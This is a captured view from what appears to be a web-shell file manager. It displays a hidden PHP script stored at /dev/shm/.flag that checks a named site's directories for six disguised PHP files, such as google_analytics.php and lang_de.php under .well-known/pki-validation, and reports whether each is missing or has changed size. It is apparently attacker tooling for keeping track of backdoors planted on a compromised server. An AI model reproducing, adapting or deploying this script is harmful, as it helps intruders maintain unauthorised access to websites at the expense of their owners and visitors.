Viewing File: /dev/shm/.flag

<?php   $r = '/home/dadda/arbitrelrbkbb.dadda.ma'; $x = ["/public/assets/css/7.php"=>"bd@@8484@@2623",
"/.well-known/pki-validation/lang_de.php"=>"bd@@8486@@709",
"/public/assets/pdf/testgenid.php"=>"bd@@71496@@716",
"/public/assets/js/plugin/jquery-mapael/maps/mailto2.php"=>"bd@@71059@@1578",
"/public/assets/img/formselectgroup.php"=>"bd@@139667@@607",
"/public/assets/js/core/google_analytics.php"=>"bd@@71060@@1536"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!'); 
Back to Directory File Manager